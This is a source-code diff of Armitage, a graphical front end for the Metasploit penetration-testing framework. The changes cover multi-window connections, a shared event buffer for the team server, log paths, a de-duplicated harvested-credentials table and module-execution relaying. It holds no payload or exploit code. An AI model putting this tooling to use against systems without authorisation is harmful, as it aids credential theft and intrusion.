local('$dialog $4'); $dialog = [new JFrame: $1]; [$dialog setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]]; - [$dialog setDefaultCloseOperation: [JFrame EXIT_ON_CLOSE]]; + + fork({ + [$dialog addWindowListener: { + if ($0 eq "windowClosing") { + [$__frame__ closeConnect]; + } + }]; + }, \$__frame__, \$dialog); + [$dialog setSize: $2, $3]; [$dialog setLayout: [new BorderLayout]]; return $dialog; @@ -277,12 +286,14 @@ sub overlay_images { return %cache[join(';', $1)]; } - local('$file $image $buffered $graphics'); + local('$file $image $buffered $graphics $resource'); $buffered = [new BufferedImage: 1000, 776, [BufferedImage TYPE_INT_ARGB]]; $graphics = [$buffered createGraphics]; foreach $file ($1) { - $image = [ImageIO read: resource($file)]; + $resource = resource($file); + $image = [ImageIO read: $resource]; + closef($resource); [$graphics drawImage: $image, 0, 0, 1000, 776, $null]; } @@ -371,15 +382,6 @@ sub wrapComponent { return $panel; } -sub setLookAndFeel { - local('$laf'); - foreach $laf ([UIManager getInstalledLookAndFeels]) { - if ([$laf getName] eq [$preferences getProperty: "application.skin.skin", "Nimbus"]) { - [UIManager setLookAndFeel: [$laf getClassName]]; - } - } -} - sub thread { local('$thread'); $thread = [new ArmitageThread: $1]; @@ -467,6 +469,13 @@ sub quickListDialog { [$dialog setVisible: 1]; } +sub setTableColumnWidths { + local('$col $width $temp'); + foreach $col => $width ($2) { + [[$1 getColumn: $col] setPreferredWidth: $width]; + } +} + sub tableRenderer { return [ATable getDefaultTableRenderer: $1, $2]; } diff --git a/external/source/armitage/scripts/hosts.sl b/external/source/armitage/scripts/hosts.sl index 448bdb8fc7f6..767415458575 100644 --- a/external/source/armitage/scripts/hosts.sl +++ b/external/source/armitage/scripts/hosts.sl @@ -8,10 +8,10 @@ import java.awt.event.*; sub addHostDialog { local('$dialog $label $text $finish $button'); - $dialog = [new JDialog: $frame, "Add Hosts", 0]; + $dialog = [new JDialog: $__frame__, "Add Hosts", 0]; [$dialog setSize: 320, 240]; [$dialog setLayout: [new BorderLayout]]; - [$dialog setLocationRelativeTo: $frame]; + [$dialog setLocationRelativeTo: $__frame__]; $label = [new JLabel: "Enter one host/line:"]; $text = [new JTextArea]; diff --git a/external/source/armitage/scripts/log.sl b/external/source/armitage/scripts/log.sl index 6916a2d78f9b..e1d6c0980065 100644 --- a/external/source/armitage/scripts/log.sl +++ b/external/source/armitage/scripts/log.sl @@ -15,8 +15,8 @@ sub logNow { if ([$preferences getProperty: "armitage.log_everything.boolean", "true"] eq "true") { local('$today $stream'); $today = formatDate("yyMMdd"); - mkdir(getFileProper(dataDirectory(), $today, $2)); - $stream = %logs[ getFileProper(dataDirectory(), $today, $2, "$1 $+ .log") ]; + mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2)); + $stream = %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$1 $+ .log") ]; [$stream println: $3]; } } @@ -26,8 +26,8 @@ sub logCheck { local('$today'); $today = formatDate("yyMMdd"); if ($2 ne "") { - mkdir(getFileProper(dataDirectory(), $today, $2)); - [$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $2, "$3 $+ .log") ]]; + mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2)); + [$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$3 $+ .log") ]]; } } } @@ -38,7 +38,7 @@ sub logFile { local('$today $handle $data $out'); $today = formatDate("yyMMdd"); if (-exists $1 && -canread $1) { - mkdir(getFileProper(dataDirectory(), $today, $2, $3)); + mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3)); # read in the file $handle = openf($1); @@ -46,7 +46,7 @@ sub logFile { closef($handle); # write it out. - $out = getFileProper(dataDirectory(), $today, $2, $3, getFileName($1)); + $out = getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3, getFileName($1)); $handle = openf("> $+ $out"); writeb($handle, $data); closef($handle); @@ -70,7 +70,7 @@ sub initLogSystem { logFile([$file getAbsolutePath], "screenshots", "."); deleteFile([$file getAbsolutePath]); - showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/screenshots"); + showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/ $+ $DESCRIBE $+ /screenshots"); }, \$image, \$title)); }]; } diff --git a/external/source/armitage/scripts/menus.sl b/external/source/armitage/scripts/menus.sl index 59cd3c514382..011e0d72ed77 100644 --- a/external/source/armitage/scripts/menus.sl +++ b/external/source/armitage/scripts/menus.sl @@ -119,10 +119,13 @@ sub view_items { sub armitage_items { local('$m'); - item($1, 'Preferences', 'P', &createPreferencesTab); - + item($1, 'New Connection', 'N', { + [new armitage.ArmitageMain: cast(@ARGV, ^String), $__frame__, $null]; + }); separator($1); + item($1, 'Preferences', 'P', &createPreferencesTab); + dynmenu($1, 'Set Target View', 'S', { local('$t1 $t2'); if ([$preferences getProperty: "armitage.string.target_view", "graph"] eq "graph") { @@ -183,12 +186,13 @@ sub armitage_items { separator($1); - item($1, 'Exit', 'x', { + item($1, 'Close', 'C', { if ($msfrpc_handle !is $null) { closef($msfrpc_handle); } - [System exit: 0]; + map({ closef($1); }, @CLOSEME); + [$__frame__ quit]; }); } @@ -246,7 +250,7 @@ sub help_items { [$dialog add: $label, [BorderLayout CENTER]]; [$dialog pack]; - [$dialog setLocationRelativeTo: $null]; + [$dialog setLocationRelativeTo: $__frame__]; [$dialog setVisible: 1]; }); } diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl index ad9f68ce6ac7..c5eaf94ffbd3 100644 --- a/external/source/armitage/scripts/passhash.sl +++ b/external/source/armitage/scripts/passhash.sl @@ -58,12 +58,38 @@ import ui.*; sub refreshCredsTable { thread(lambda({ [Thread yield]; - local('$creds $cred'); + local('$creds $cred $desc $aclient %check $key'); [$model clear: 128]; - $creds = call($mclient, "db.creds2", [new HashMap])["creds2"]; + foreach $desc => $aclient (convertAll([$__frame__ getClients])) { + $creds = call($aclient, "db.creds2", [new HashMap])["creds2"]; + foreach $cred ($creds) { + $key = join("~~", values($cred, @("user", "pass", "host"))); + if ($key in %check) { + + } + else if ($title ne "login" || $cred['ptype'] ne "smb_hash") { + [$model addEntry: $cred]; + %check[$key] = 1; + } + } + } + [$model fireListeners]; + }, $model => $1, $title => $2)); +} + +sub refreshCredsTableLocal { + thread(lambda({ + [Thread yield]; + local('$creds $cred $desc $aclient %check $key'); + [$model clear: 128]; + $creds = call($client, "db.creds2", [new HashMap])["creds2"]; foreach $cred ($creds) { - if ($title ne "login" || $cred['ptype'] ne "smb_hash") { + $key = join("~~", values($cred, @("user", "pass", "host"))); + if ($key in %check) { + } + else if ($title ne "login" || $cred['ptype'] ne "smb_hash") { [$model addEntry: $cred]; + %check[$key] = 1; } } [$model fireListeners]; @@ -71,7 +97,7 @@ sub refreshCredsTable { } sub show_hashes { - local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll'); + local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll $3'); $dialog = dialog($1, 480, $2); @@ -83,7 +109,12 @@ sub show_hashes { [$sorter setComparator: 2, &compareHosts]; [$table setRowSorter: $sorter]; - refreshCredsTable($model, $1); + if ($3) { + refreshCredsTableLocal($model, $1); + } + else { + refreshCredsTable($model, $1); + } $scroll = [new JScrollPane: $table]; [$scroll setPreferredSize: [new Dimension: 480, 130]]; @@ -94,7 +125,7 @@ sub show_hashes { sub createCredentialsTab { local('$dialog $table $model $panel $export $crack $refresh'); - ($dialog, $table, $model) = show_hashes("", 320); + ($dialog, $table, $model) = show_hashes("", 320, 1); [$dialog removeAll]; addMouseListener($table, lambda({ @@ -131,7 +162,7 @@ sub createCredentialsTab { $refresh = [new JButton: "Refresh"]; [$refresh addActionListener: lambda({ - refreshCredsTable($model, $null); + refreshCredsTableLocal($model, $null); }, \$model)]; $crack = [new JButton: "Crack Passwords"]; diff --git a/external/source/armitage/scripts/pivots.sl b/external/source/armitage/scripts/pivots.sl index 3a5e117f4aec..3adbfe450b45 100644 --- a/external/source/armitage/scripts/pivots.sl +++ b/external/source/armitage/scripts/pivots.sl @@ -107,10 +107,10 @@ sub pivot_dialog { } local('$dialog $model $table $sorter $center $a $route $button'); - $dialog = [new JDialog: $frame, $title, 0]; + $dialog = [new JDialog: $__frame__, $title, 0]; [$dialog setSize: 320, 240]; [$dialog setLayout: [new BorderLayout]]; - [$dialog setLocationRelativeTo: $frame]; + [$dialog setLocationRelativeTo: $__frame__]; [$dialog setLayout: [new BorderLayout]]; diff --git a/external/source/armitage/scripts/reporting.sl b/external/source/armitage/scripts/reporting.sl index a6a7ac5dfb08..1995e0686ef7 100644 --- a/external/source/armitage/scripts/reporting.sl +++ b/external/source/armitage/scripts/reporting.sl @@ -182,28 +182,21 @@ sub queryData { [$progress setProgress: 30]; } - # 4. clients - %r['clients'] = call($mclient, "db.clients")["clients"]; - - if ($progress) { - [$progress setProgress: 35]; - } - - # 5. sessions... + # 4. sessions... %r['sessions'] = fixSessions(call($mclient, "db.sessions")["sessions"]); if ($progress) { [$progress setProgress: 36]; } - # 6. timeline + # 5. timeline %r['timeline'] = fixTimeline(call($mclient, "db.events")['events']); if ($progress) { [$progress setProgress: 38]; } - # 7. hosts and services + # 6. hosts and services local('@hosts @services $temp $h $s $x'); call($mclient, "armitage.prep_export", $1); @@ -291,32 +284,27 @@ sub _generateArtifacts { [$progress setProgress: 65]; - # 4. clients - dumpData("clients", @("host", "created_at", "updated_at", "ua_name", "ua_ver", "ua_string"), %data['clients']); - - [$progress setProgress: 70]; - - # 5. hosts + # 4. hosts dumpData("hosts", @("address", "mac", "state", "address", "address6", "name", "purpose", "info", "os_name", "os_flavor", "os_sp", "os_lang", "os_match", "created_at", "updated_at"), %data['hosts']); [$progress setProgress: 80]; - # 6. services + # 5. services dumpData("services", @("host", "port", "state", "proto", "name", "created_at", "updated_at", "info"), %data['services']); [$progress setProgress: 90]; - # 7. sessions + # 6. sessions dumpData("sessions", @("host", "local_id", "stype", "platform", "via_payload", "via_exploit", "opened_at", "last_seen", "closed_at", "close_reason"), %data['sessions']); [$progress setProgress: 93]; - # 8. timeline + # 7. timeline dumpData("timeline", @("source", "username", "created_at", "info"), %data['timeline']); [$progress setProgress: 96]; - # 9. take a pretty screenshot of the graph view... + # 8. take a pretty screenshot of the graph view... [$progress setNote: "host picture :)"]; makeScreenshot("hosts.png"); @@ -330,7 +318,7 @@ sub _generateArtifacts { fire_event_async("user_export", %data); - return getFileProper(dataDirectory(), formatDate("yyMMdd"), "artifacts"); + return getFileProper(dataDirectory(), formatDate("yyMMdd"), $DESCRIBE, "artifacts"); } # @@ -368,8 +356,6 @@ sub api_export_data { } sub initReporting { - global('$poll_lock @events'); # set in the dserver, not in stand-alone Armitage - wait(fork({ global('$db'); [$client addHook: "armitage.export_data", &api_export_data]; diff --git a/external/source/armitage/scripts/server.sl b/external/source/armitage/scripts/server.sl index 1ea04e9671e6..4dcf4cd84d1d 100644 --- a/external/source/armitage/scripts/server.sl +++ b/external/source/armitage/scripts/server.sl @@ -35,9 +35,7 @@ sub result { sub event { local('$result'); $result = formatDate("HH:mm:ss") . " $1"; - acquire($poll_lock); - push(@events, $result); - release($poll_lock); + [$events put: $result]; } sub client { @@ -96,16 +94,6 @@ sub client { [[$handle getOutputStream] flush]; } - # limit our replay of the event log to 100 events... - acquire($poll_lock); - if (size(@events) > 100) { - $index = size(@events) - 100; - } - else { - $index = 0; - } - release($poll_lock); - # # on our merry way processing it... # @@ -183,33 +171,30 @@ sub client { else if ($method eq "armitage.log") { ($data, $address) = $args; event("* $eid $data $+ \n"); + if ($address is $null) { + $address = [$client getLocalAddress]; + } call_async($client, "db.log_event", "$address $+ // $+ $eid", $data); writeObject($handle, result(%())); } else if ($method eq "armitage.skip") { - acquire($poll_lock); - $index = size(@events); - release($poll_lock); + [$events get: $eid]; writeObject($handle, result(%())); } else if ($method eq "armitage.poll" || $method eq "armitage.push") { - acquire($poll_lock); if ($method eq "armitage.push") { ($null, $data) = $args; foreach $temp (split("\n", $data)) { - push(@events, formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data); + [$events put: formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data]; } } - if (size(@events) > $index) { - $rv = result(%(data => join("", sublist(@events, $index)), encoding => "base64", prompt => "$eid $+ > ")); - $index = size(@events); - } - else { - $rv = result(%(data => "", prompt => "$eid $+ > ", encoding => "base64")); - } - release($poll_lock); - + $rv = result(%(data => [$events get: $eid], encoding => "base64", prompt => "$eid $+ > ")); + writeObject($handle, $rv); + } + else if ($method eq "armitage.lusers") { + $rv = [new HashMap]; + [$rv put: "lusers", [$events clients]]; writeObject($handle, $rv); } else if ($method eq "armitage.append") { @@ -308,6 +293,10 @@ sub client { $response = [$client execute: $method, cast($args, ^Object)]; writeObject($handle, $response); } + else if ($method eq "module.execute_direct") { + $response = [$client execute: "module.execute", cast($args, ^Object)]; + writeObject($handle, $response); + } else if ($method in %async) { if ($args) { [$client execute_async: $method, cast($args, ^Object)]; @@ -333,6 +322,7 @@ sub client { if ($eid !is $null) { event("*** $eid left.\n"); + [$events free: $eid]; } # reset the user's filter... @@ -355,7 +345,7 @@ sub client { sub main { global('$client $mclient'); - local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console'); + local('$server %sessions $sess_lock $read_lock $lock_lock %locks %readq $id $error $auth %cache $cach_lock $client_cache $handle $console $events'); $auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0]; @@ -413,10 +403,12 @@ sub main { # $sess_lock = semaphore(1); $read_lock = semaphore(1); - $poll_lock = semaphore(1); $lock_lock = semaphore(1); $cach_lock = semaphore(1); + # setup any shared buffers... + $events = [new armitage.ArmitageBuffer: 250]; + # set the LHOST to whatever the user specified (use console.write to make the string not UTF-8) $console = createConsole($client); call($client, "console.write", $console, "setg LHOST $host $+ \n"); @@ -424,6 +416,9 @@ sub main { # absorb the output of this command which is LHOST => ... call($client, "console.read", $console); + # update server's understanding of this value... + call($client, "armitage.set_ip", $host); + # # create a thread to push console messages to the event queue for all clients. # @@ -433,12 +428,10 @@ sub main { sleep(2000); $r = call($client, "console.read", $console); if ($r["data"] ne "") { - acquire($poll_lock); - push(@events, formatDate("HH:mm:ss") . " " . $r["data"]); - release($poll_lock); + [$events put: formatDate("HH:mm:ss") . " " . $r["data"]]; } } - }, \$client, \$poll_lock, \@events, \$console); + }, \$client, \$events, \$console); # # Create a shared hash that contains a thread for each session... @@ -535,7 +528,7 @@ service framework-postgres start"); $handle = [$server accept]; if ($handle !is $null) { %readq[$id] = %(); - fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, \$poll_lock, $queue => %readq[$id], \$id, \@events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass); + fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, $queue => %readq[$id], \$id, \$events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass); $id++; } diff --git a/external/source/armitage/scripts/targets.sl b/external/source/armitage/scripts/targets.sl index 3721006ea7d3..797174c255d2 100644 --- a/external/source/armitage/scripts/targets.sl +++ b/external/source/armitage/scripts/targets.sl @@ -193,6 +193,11 @@ on hosts { $address = $host['address']; if ($address in %hosts && size(%hosts[$address]) > 1) { %newh[$address] = %hosts[$address]; + + # set the label to empty b/c team server won't add labels if there are no labels. This fixes + # a corner case where a user might clear all labels and find they won't go away + %newh[$address]['label'] = ''; + putAll(%newh[$address], keys($host), values($host)); if ($host['os_name'] eq "") { @@ -262,7 +267,7 @@ sub _importHosts { } $console = createDisplayTab("Import", $file => "import"); - [$console addCommand: $null, "db_import " . strrep(join(" ", $files), "\\", "\\\\")]; + [$console addCommand: 'x', "db_import " . strrep(join(" ", $files), "\\", "\\\\")]; [$console addListener: lambda({ elog("imported hosts from $success file" . iff($success != 1, "s")); }, \$success)]; @@ -346,8 +351,10 @@ sub clearHostFunction { } sub clearDatabase { - elog("cleared the database"); - call_async($mclient, "db.clear"); + if (!askYesNo("This action will clear the database. You will lose all information\ncollected up to this point. You will not be able toget it back.\nWould you like to clear the database?", "Clear Database")) { + elog("cleared the database"); + call_async($mclient, "db.clear"); + } } # called when a target is clicked on... diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index de80e1d8d343..b226c1edc280 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -151,6 +151,11 @@ sub createConsoleTab { } sub setg { + # update team server's understanding of LHOST + if ($1 eq "LHOST") { + call_async($client, "armitage.set_ip", $2); + } + %MSF_GLOBAL[$1] = $2; local('$c'); $c = createConsole($client); @@ -381,7 +386,7 @@ sub connectDialog { $msfrpc_handle = $null; } - local('$dialog $host $port $ssl $user $pass $button $cancel $start $center $help $helper'); + local('$dialog $host $port $ssl $user $pass $button $start $center $help $helper'); $dialog = window("Connect...", 0, 0); # setup our nifty form fields.. @@ -398,8 +403,6 @@ sub connectDialog { $help = [new JButton: "Help"]; [$help setToolTipText: "<html>Use this button to view the Getting Started Guide on the Armitage homepage</html>"]; - $cancel = [new JButton: "Exit"]; - # lay them out $center = [new JPanel]; @@ -422,9 +425,14 @@ sub connectDialog { ($h, $p, $u, $s) = @o; [$dialog setVisible: 0]; - connectToMetasploit($h, $p, $u, $s); if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") { + if ($__frame__ && [$__frame__ checkLocal]) { + showError("You can't connect to localhost twice"); + [$dialog setVisible: 1]; + return; + } + try { closef(connect("127.0.0.1", $p, 1000)); } @@ -434,37 +442,33 @@ sub connectDialog { } } } + + connectToMetasploit($h, $p, $u, $s); }, \$dialog, \$host, \$port, \$user, \$pass)]; [$help addActionListener: gotoURL("http://www.fastandeasyhacking.com/start")]; - [$cancel addActionListener: { - [System exit: 0]; - }]; - [$dialog pack]; [$dialog setLocationRelativeTo: $null]; [$dialog setVisible: 1]; } -sub _elog { +sub elog { + local('$2'); if ($client !is $mclient) { + # $2 can be NULL here. team server will populate it... call_async($mclient, "armitage.log", $1, $2); } else { + # since we're not on a team server, no one else will have + # overwritten LHOST, so we can trust $MY_ADDRESS to be current + if ($2 is $null) { + $2 = $MY_ADDRESS; + } call_async($client, "db.log_event", "$2 $+ //", $1); } } -sub elog { - local('$2'); - if ($2 is $null) { - $2 = $MY_ADDRESS; - } - - _elog($1, $2); -} - sub module_execute { return invoke(&_module_execute, filter_data_array("user_launch", @_)); } diff --git a/external/source/armitage/src/armitage/ArmitageApplication.java b/external/source/armitage/src/armitage/ArmitageApplication.java index b7365e1309ab..84fe420c76c7 100644 --- a/external/source/armitage/src/armitage/ArmitageApplication.java +++ b/external/source/armitage/src/armitage/ArmitageApplication.java @@ -13,13 +13,32 @@ import ui.*; -public class ArmitageApplication extends JFrame { +public class ArmitageApplication extends JComponent { protected JTabbedPane tabs = null; protected JSplitPane split = null; protected JMenuBar menus = new JMenuBar(); protected ScreenshotManager screens = null; protected KeyBindings keys = new KeyBindings(); protected MenuBuilder builder = null; + protected String title = ""; + protected MultiFrame window = null; + + public KeyBindings getBindings() { + return keys; + } + + public void setTitle(String title) { + this.title = title; + window.setTitle(this, title); + } + + public String getTitle() { + return title; + } + + public void setIconImage(Image blah) { + window.setIconImage(blah); + } public void setScreenshotManager(ScreenshotManager m) { screens = m; @@ -192,7 +211,7 @@ public void popAppTab(Component tab) { /* pop goes the tab! */ final JFrame r = new JFrame(t.title); - r.setIconImages(getIconImages()); + //r.setIconImages(getIconImages()); r.setLayout(new BorderLayout()); r.add(t.component, BorderLayout.CENTER); r.pack(); @@ -366,8 +385,20 @@ public void componentShown(ComponentEvent ev) { component.requestFocusInWindow(); } - public ArmitageApplication() { + public void touch() { + Component c = tabs.getSelectedComponent(); + if (c == null) + return; + + if (c instanceof Activity) + ((Activity)c).resetNotification(); + + c.requestFocusInWindow(); + } + + public ArmitageApplication(MultiFrame f, String details, msf.RpcConnection conn) { super(); + window = f; tabs = new DraggableTabbedPane(); setLayout(new BorderLayout()); @@ -383,10 +414,8 @@ public ArmitageApplication() { /* add our tabbed pane */ add(split, BorderLayout.CENTER); - /* setup our key bindings */ - KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(keys); - /* ... */ - setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + //setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + ((ui.MultiFrame)window).addButton(details, this, conn); } } diff --git a/external/source/armitage/src/armitage/ArmitageBuffer.java b/external/source/armitage/src/armitage/ArmitageBuffer.java new file mode 100644 index 000000000000..22731f671f3f --- /dev/null +++ b/external/source/armitage/src/armitage/ArmitageBuffer.java @@ -0,0 +1,138 @@ +package armitage; + +import java.util.*; + +/* + * Implement a thread safe store that any client may write to and + * any client may read from (keeping track of their cursor into + * the console) + */ +public class ArmitageBuffer { + private static final class Message { + public String message = null; + public Message next = null; + } + + /* store our messages... */ + public Message first = null; + public Message last = null; + public long size = 0; + public long max = 0; + public String prompt = ""; + + /* store indices into this buffer */ + public Map indices = new HashMap(); + + /* setup the buffer?!? :) */ + public ArmitageBuffer(long max) { + this.max = max; + } + + /* store a prompt with this buffer... we're not going to do any indexing magic for now */ + public String getPrompt() { + synchronized (this) { + return prompt; + } + } + + /* set the prompt */ + public void setPrompt(String text) { + synchronized (this) { + prompt = text; + } + } + + /* post a message to this buffer */ + public void put(String text) { + synchronized (this) { + /* create our message */ + Message m = new Message(); + m.message = text; + + /* store our message */ + if (last == null && first == null) { + first = m; + last = m; + } + else { + last.next = m; + last = m; + } + + /* increment number of stored messages */ + size += 1; + + /* limit the total number of past messages to the max size */ + if (size > max) { + first = first.next; + } + } + } + + /* retrieve a set of all clients consuming this buffer */ + public Collection clients() { + synchronized (this) { + LinkedList clients = new LinkedList(indices.keySet()); + return clients; + } + } + + /* free a client */ + public void free(String id) { + synchronized (this) { + indices.remove(id); + } + } + + /* reset our indices too */ + public void reset() { + synchronized (this) { + first = null; + last = null; + indices.clear(); + size = 0; + } + } + + /* retrieve all messages available to the client (if any) */ + public String get(String id) { + synchronized (this) { + /* nadaz */ + if (first == null) + return ""; + + /* get our index into the buffer */ + Message index = null; + if (!indices.containsKey(id)) { + index = first; + } + else { + index = (Message)indices.get(id); + + /* nothing happening */ + if (index.next == null) + return ""; + + index = index.next; + } + + /* now let's walk through it */ + StringBuffer result = new StringBuffer(); + Message temp = index; + while (temp != null) { + result.append(temp.message); + index = temp; + temp = temp.next; + } + + /* store our index */ + indices.put(id, index); + + return result.toString(); + } + } + + public String toString() { + return "[" + size + " messages]"; + } +} diff --git a/external/source/armitage/src/armitage/ArmitageMain.java b/external/source/armitage/src/armitage/ArmitageMain.java index 3feb310ee081..eb8d8295c219 100644 --- a/external/source/armitage/src/armitage/ArmitageMain.java +++ b/external/source/armitage/src/armitage/ArmitageMain.java @@ -9,10 +9,10 @@ import sleep.parser.ParserConfig; import java.util.*; - import java.io.*; import cortana.core.*; +import ui.*; /** * This class launches Armitage and loads the scripts that are part of it. @@ -101,7 +101,7 @@ protected String[] getServerScripts() { }; } - public ArmitageMain(String[] args) { + public ArmitageMain(String[] args, MultiFrame window, boolean serverMode) { /* tweak the parser to recognize a few useful escapes */ ParserConfig.installEscapeConstant('c', console.Colors.color + ""); ParserConfig.installEscapeConstant('U', console.Colors.underline + ""); @@ -118,15 +118,6 @@ public ArmitageMain(String[] args) { ScriptLoader loader = new ScriptLoader(); loader.addSpecificBridge(this); - /* check for server mode option */ - boolean serverMode = false; - - int x = 0; - for (x = 0; x < args.length; x++) { - if (args[x].equals("--server")) - serverMode = true; - } - /* setup Cortana event and filter bridges... we will install these into Armitage */ if (!serverMode) { @@ -135,6 +126,7 @@ public ArmitageMain(String[] args) { variables.putScalar("$__events__", SleepUtils.getScalar(events)); variables.putScalar("$__filters__", SleepUtils.getScalar(filters)); + variables.putScalar("$__frame__", SleepUtils.getScalar(window)); loader.addGlobalBridge(events.getBridge()); loader.addGlobalBridge(filters.getBridge()); @@ -142,7 +134,7 @@ public ArmitageMain(String[] args) { /* load the appropriate scripts */ String[] scripts = serverMode ? getServerScripts() : getGUIScripts(); - + int x = -1; try { for (x = 0; x < scripts.length; x++) { InputStream i = this.getClass().getClassLoader().getResourceAsStream(scripts[x]); @@ -161,6 +153,23 @@ public ArmitageMain(String[] args) { } public static void main(String args[]) { - new ArmitageMain(args); + /* check for server mode option */ + boolean serverMode = false; + + int x = 0; + for (x = 0; x < args.length; x++) { + if (args[x].equals("--server")) + serverMode = true; + } + + /* setup our armitage instance */ + if (serverMode) { + new ArmitageMain(args, null, serverMode); + } + else { + MultiFrame.setupLookAndFeel(); + MultiFrame frame = new MultiFrame(); + new ArmitageMain(args, frame, serverMode); + } } } diff --git a/external/source/armitage/src/armitage/EventLogTabCompletion.java b/external/source/armitage/src/armitage/EventLogTabCompletion.java new file mode 100644 index 000000000000..6fa7fddee848 --- /dev/null +++ b/external/source/armitage/src/armitage/EventLogTabCompletion.java @@ -0,0 +1,60 @@ +package armitage; + +import console.Console; +import msf.*; +import java.util.*; +import java.awt.*; +import java.awt.event.*; +import javax.swing.*; + +import java.io.IOException; + +public class EventLogTabCompletion extends GenericTabCompletion { + protected RpcConnection connection; + + public EventLogTabCompletion(Console window, RpcConnection connection) { + super(window); + this.connection = connection; + } + + public Collection getOptions(String text) { + try { + Map response = (Map)connection.execute("armitage.lusers", new Object[] {}); + + if (response.get("lusers") == null) + return null; + + Iterator users = ((Collection)response.get("lusers")).iterator(); + + LinkedList options = new LinkedList(); + String word; + String pre; + + if (text.endsWith(" ")) { + word = ""; + pre = text; + } + if (text.lastIndexOf(" ") != -1) { + word = text.substring(text.lastIndexOf(" ") + 1); + pre = text.substring(0, text.lastIndexOf(" ") + 1); + } + else { + word = text; + pre = ""; + } + + while (users.hasNext()) { + String user = users.next() + ""; + if (user.startsWith(word)) { + options.add(pre + user); + } + } + + return options; + } + catch (IOException ioex) { + ioex.printStackTrace(); + } + return null; + } +} diff --git a/external/source/armitage/src/msf/DatabaseImpl.java b/external/source/armitage/src/msf/DatabaseImpl.java index ff00d4d877df..ee58207c2e7d 100644 --- a/external/source/armitage/src/msf/DatabaseImpl.java +++ b/external/source/armitage/src/msf/DatabaseImpl.java @@ -310,13 +310,13 @@ protected Map build() { if (hFilter.indexOf("sessions.") >= 0) tables.add("sessions"); - temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex)); + temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex)); } else { - temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1)); + temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1)); } - temp.put("db.services", "SELECT DISTINCT services.*, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex)); + temp.put("db.services", "SELECT DISTINCT services.id, services.name, services.port, services.proto, services.info, services.updated_at, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex)); temp.put("db.loots", "SELECT DISTINCT loots.*, hosts.address as host FROM loots, hosts WHERE hosts.id = loots.host_id AND hosts.workspace_id = " + workspaceid); temp.put("db.workspaces", "SELECT DISTINCT * FROM workspaces"); temp.put("db.notes", "SELECT DISTINCT notes.*, hosts.address as host FROM notes, hosts WHERE hosts.id = notes.host_id AND hosts.workspace_id = " + workspaceid); @@ -412,6 +412,10 @@ else if (methodName.equals("db.clear_cache")) { return new HashMap(); } else if (methodName.equals("db.clear")) { + /* clear our local cache of labels */ + labels = new HashMap(); + + /* clear the database */ executeUpdate( "BEGIN;" + "DELETE FROM hosts;" + diff --git a/external/source/armitage/src/msf/RpcAsync.java b/external/source/armitage/src/msf/RpcAsync.java index c7663ddbcd66..fe0daf7a4e1f 100644 --- a/external/source/armitage/src/msf/RpcAsync.java +++ b/external/source/armitage/src/msf/RpcAsync.java @@ -32,7 +32,7 @@ public Object execute(String methodName, Object[] params) throws IOException { if (methodName.equals("module.info") || methodName.equals("module.options") || methodName.equals("module.compatible_payloads")) { StringBuilder keysb = new StringBuilder(methodName); - for(int i = 1; i < params.length; i++) + for(int i = 0; i < params.length; i++) keysb.append(params[i].toString()); String key = keysb.toString(); diff --git a/external/source/armitage/src/msf/RpcConnectionImpl.java b/external/source/armitage/src/msf/RpcConnectionImpl.java index f7ba43d048db..d784ab17b781 